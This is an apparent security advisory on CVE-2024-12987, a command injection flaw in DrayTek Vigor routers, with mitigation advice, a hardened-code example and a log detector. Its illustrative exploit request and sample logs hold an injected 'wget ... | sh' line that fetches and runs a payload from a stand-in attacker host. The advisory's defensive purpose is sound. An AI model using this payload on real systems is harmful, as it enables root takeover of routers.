CVE-2024-12987 allows OS command injection via DrayTek Vigor router web interfaces. Learn which models are affected and how to mitigate this critical flaw.
Summary of CVE-2024-12987
A critical OS command injection vulnerability (CVE-2024-12987) has been identified in DrayTek Vigor2960, Vigor300B, and Vigor3900 routers. The flaw resides in the web management interface, specifically in the `apmcfgupload` handler of the `mainfunction.cgi` endpoint.
CVSS v3.1 Score: 9.8 (Critical)
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
Whether the management interface is exposed on the WAN or only on the LAN determines who can reach the endpoint; it does not change the fact that no credentials are needed once the endpoint is reachable.
The vulnerability allows remote unauthenticated attackers to execute arbitrary OS commands on affected devices.
Affected DrayTek Router Models
The following devices are confirmed vulnerable if running unpatched firmware:
- Vigor2960 – Enterprise dual-WAN firewall
- Vigor300B – Multi-WAN load balancer
- Vigor3900 – Enterprise-grade VPN concentrator
All models are typically deployed in:
- SMB and branch office networks
- Remote site VPN hubs
- ISP-provided enterprise CPE equipment
Technical Analysis of the Vulnerability
The root cause is insufficient input sanitization in the web interface's `/cgi-bin/mainfunction.cgi/apmcfgupload` handler. This endpoint processes configuration uploads; because the uploaded fields are passed to a shell without validation, an attacker can embed shell metacharacters (e.g. `;`, `&&`, `|`) in POST parameters and have everything after the metacharacter executed as a separate command.
Exploit Path:
- HTTP POST to `/cgi-bin/mainfunction.cgi/apmcfgupload`
- Crafted payload with a shell command embedded in one of the configuration fields
- The web server process (`lighttpd` or equivalent) runs the handler as root, so the injected command executes with root privileges
Exploitation Details
A successful exploit enables:
- Full shell command execution as root
- Persistent backdoor installation (e.g., crontab modification)
- Firewall rule changes, VPN reconfiguration, or credential harvesting
- Use of router as a pivot point or proxy into internal networks
Proof-of-concept (PoC) code has already been observed circulating in private threat actor forums.
Example POST request (illustrative; the field name and the payload URL are placeholders, not a working exploit):

```http
POST /cgi-bin/mainfunction.cgi/apmcfgupload HTTP/1.1
Host: <router-ip>
Content-Type: multipart/form-data; boundary=---abc
...

-----abc
Content-Disposition: form-data; name="cfgfile"; filename="exploit.cfg"

dummy;wget http://attacker.com/payload.sh|sh
-----abc--
```
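The request above works because the upload field is spliced into a command string that a shell then parses, so the `;` ends the intended command and starts the attacker's. The following Python model, added here and not taken from DrayTek's firmware (the real handler is closed-source C), shows that flawed pattern next to a hardened one. The function names, the `echo`-based stand-in for the `wget ... | sh` payload and the allowlist are assumptions chosen so the example runs harmlessly on any machine with `/bin/sh`.

```python
import re
import subprocess

# Constructed stand-in for the injected upload field shown in the PoC request:
# the same "value;command" shape, but with a harmless echo instead of wget|sh.
INJECTED_NAME = "dummy;echo INJECTED"

# Allowlist for a config-file name: alphanumeric start, then a short run of
# [A-Za-z0-9_.-].  No slashes, spaces or shell syntax can get through.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,63}$")


def vulnerable_upload(name: str) -> str:
    """Model of the flawed handler (hypothetical): the user-controlled upload
    name is concatenated into a command string and handed to /bin/sh, so ';',
    '|', '&&' and friends are parsed as shell syntax rather than as data."""
    cmd = "echo storing " + name          # becomes: echo storing dummy;echo INJECTED
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_upload(name: str) -> str:
    """Hardened handler: reject anything outside the allowlist, then execute
    with an argv list and shell=False so the name can only ever be an argument."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"rejected upload name: {name!r}")
    argv = ["echo", "storing", name]      # no shell is involved at all
    return subprocess.run(argv, capture_output=True, text=True).stdout


def is_rejected(name: str) -> bool:
    """True if the hardened handler refuses the name."""
    try:
        hardened_upload(name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", repr(vulnerable_upload(INJECTED_NAME)))  # second command ran
    print("hardened  :", repr(hardened_upload("vigor.cfg")))
    print("hardened rejects injected name:", is_rejected(INJECTED_NAME))
```

In C firmware the equivalent fix is to replace `system()` or `popen()` on a formatted string with `execve()` on a fixed argv, after validating the field against an allowlist; the argv form above mirrors that. Escaping or quoting alone is a weaker fix, because every new parameter path has to remember to do it.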
Risk Assessment and Potential Impact
| Category | Details |
|---|---|
| Remotely exploitable | Yes (WAN-facing management interfaces are the most exposed) |
| Privilege level gained | Root |
| Authentication | None required; a public-facing interface makes the endpoint reachable by anyone |
| Persistence risk | High: an attacker can modify startup configuration and cron jobs |
| Target scope | Routers in over 20 countries (based on Shodan) |
This flaw is extremely dangerous for any unpatched WAN-exposed DrayTek deployment, particularly in SMBs with limited security controls.
Detection Guidance and IOCs
Network Indicators:
- POST requests to `/cgi-bin/mainfunction.cgi/apmcfgupload`, especially from the WAN side or from unexpected geolocations
- Suspicious `User-Agent` strings (scripting libraries, scanners) or shell metacharacters (`;`, `&&`, `|`, backticks, `$(`) in request parameters
- Outbound connections from the router to attacker infrastructure, e.g. a second-stage payload download immediately after such a request
System Indicators:
- Unusual processes running as root, particularly shells or downloaders spawned by the web server process
- Unexpected cron jobs or modifications to `/etc/rc.local`
- New binaries or scripts in `/tmp`, `/var/tmp`, or `/mnt`
Suggested Detection Rules:
- Suricata/Zeek rules that alert on `apmcfgupload` endpoint abuse
- Log parsing for shell metacharacter usage in `cgi-bin` POST requests
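The two suggested rules can be prototyped in a few dozen lines. The Python detector below is an added example, not something from the page's source or from any vendor: it parses lighttpd/Apache combined-format access-log lines, and, where a proxy or IDS hands it the request body as well, the multipart upload itself, and flags every hit on `apmcfgupload` plus any `cgi-bin` POST whose parameters carry shell metacharacters. The log lines, IP addresses, parameter names and severity labels are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

TARGET = "/cgi-bin/mainfunction.cgi/apmcfgupload"
CGI_PREFIX = "/cgi-bin/"

# Shell metacharacters that have no business in a config-upload parameter:
# separators, pipes, backticks, $(...) / ${...} and embedded newlines.
META = re.compile(r"[;|&`\n]|\$[({]")

# Apache/lighttpd "combined" access-log format.
COMBINED = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines (RFC 5737 test addresses), not real traffic: a WAN-side
# injection attempt, a benign LAN admin upload, static content, and another cgi-bin
# handler probed with an "&&"-chained command.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [10/Jan/2025:03:14:07 +0000] "POST /cgi-bin/mainfunction.cgi/apmcfgupload'
    '?file=x%3Bwget%20http%3A%2F%2F198.51.100.9%2Fp.sh%7Csh HTTP/1.1" 200 512 "-" "python-requests/2.31.0"',
    '192.168.1.20 - admin [10/Jan/2025:09:02:11 +0000] "POST /cgi-bin/mainfunction.cgi/apmcfgupload HTTP/1.1"'
    ' 200 120 "http://192.168.1.1/" "Mozilla/5.0"',
    '192.168.1.20 - admin [10/Jan/2025:09:02:12 +0000] "GET /images/logo.png HTTP/1.1" 200 2048 "http://192.168.1.1/" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2025:03:14:09 +0000] "POST /cgi-bin/mainfunction.cgi/other?mode=1%26%26id HTTP/1.1"'
    ' 200 64 "-" "python-requests/2.31.0"',
]

# Constructed multipart body mirroring the PoC request shape (test address, not a real host).
SAMPLE_MULTIPART_BODY = (
    "-----abc\r\n"
    'Content-Disposition: form-data; name="cfgfile"; filename="exploit.cfg"\r\n'
    "\r\n"
    "dummy;wget http://198.51.100.9/payload.sh|sh\r\n"
    "-----abc--\r\n"
)


def decode(value: str) -> str:
    """URL-decode twice so double-encoded payloads (%253B -> %3B -> ;) are caught."""
    return unquote_plus(unquote_plus(value))


def body_values(content_type: str, body: str):
    """Yield only the user-controlled fields of a request body, skipping the MIME
    scaffolding (boundaries, Content-Disposition headers) that legitimately has ';'."""
    if content_type.startswith("multipart/form-data"):
        m = re.search(r'boundary="?([^";]+)"?', content_type)
        if not m:
            yield body
            return
        for part in body.split("--" + m.group(1)):
            part = part.strip("\r\n")
            if not part or part == "--":
                continue
            headers, _, content = part.partition("\r\n\r\n")
            fn = re.search(r'filename="([^"]*)"', headers)
            if fn:
                yield fn.group(1)           # the filename is attacker-controlled too
            yield content
    elif content_type.startswith("application/x-www-form-urlencoded"):
        for _, v in parse_qsl(body, keep_blank_values=True):
            yield v
    else:
        yield body


def classify(method, target, src="-", ua="-", content_type="", body=""):
    """Return a finding for a request worth attention, or None."""
    path, _, query = target.partition("?")
    values = [decode(v) for _, v in parse_qsl(query, keep_blank_values=True)]
    values += [decode(v) for v in body_values(content_type, body)]
    evidence = [v for v in values if META.search(v)]
    if path == TARGET and method == "POST":
        severity = "high" if evidence else "info"   # every hit on the endpoint is recorded
    elif path.startswith(CGI_PREFIX) and method == "POST" and evidence:
        severity = "medium"                          # other cgi-bin handlers, same pattern
    else:
        return None
    return {"severity": severity, "src": src, "path": path, "ua": ua, "evidence": evidence}


def scan_access_log(lines):
    """Run classify() over combined-format access-log lines (no bodies available there)."""
    findings = []
    for line in lines:
        m = COMBINED.match(line)
        if m:
            f = classify(m["method"], m["target"], src=m["src"], ua=m["ua"])
            if f:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f)
    print(classify("POST", TARGET, src="203.0.113.7",
                   content_type="multipart/form-data; boundary=---abc",
                   body=SAMPLE_MULTIPART_BODY))
```

Access logs only carry the request line, so a payload sent purely in the POST body is invisible to `scan_access_log`; that is why the "info" finding on every `apmcfgupload` hit matters, and why the body-aware `classify` path needs a capture source (Zeek, a reverse proxy, or full packet capture) in front of the router. The multipart parser deliberately ignores the `Content-Disposition` headers, which always contain `;`, to avoid alerting on every legitimate upload.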
Mitigation and Security Recommendations
1. Apply Firmware Updates Immediately
DrayTek has issued firmware updates addressing this flaw. All organizations using affected models must upgrade without delay.
2. Disable Remote Management
Ensure WAN access to the web interface is disabled unless strictly required. On the affected Vigor models this is set in the web UI's management/access-control settings; the command below is generic, Cisco-style illustrative syntax rather than DrayTek's own CLI, and must be mapped to the device's actual interface:

```text
# Check and disable on CLI
router(config)# no remote-management http
```
3. Enforce Firewall Rules
- Block inbound WAN access to the router's HTTP/HTTPS management ports (80/443 by default, or whatever custom port has been configured)
- Restrict access by IP allowlists (VPN-only access recommended)
4. Monitor and Audit Logs
- Look for anomalous HTTP POST patterns
- Analyze router system logs for configuration changes and unauthorized access attempts
5. Replace EoL Devices
If firmware support is not available or the device is end-of-life, decommission and replace with supported models.
Vendor Response and Patch Availability
DrayTek has released the following patches:
- Vigor3900 – Firmware version 1.5.1_RC3
- Vigor2960 – Firmware version 1.5.1_RC3
- Vigor300B – Firmware version 1.5.1_RC3
Patch release notes and updated binaries can be accessed via DrayTek’s official support portal.
Conclusion
CVE-2024-12987 is a critical remote OS command injection vulnerability that directly threatens core networking infrastructure used by thousands of businesses globally. Given the low complexity and high impact of exploitation, organizations should treat this as an urgent remediation priority.
Neglecting to patch these routers could expose enterprise networks to backdoors, data exfiltration, and total network compromise. Apply updates immediately and strengthen perimeter defenses to block potential exploitation attempts.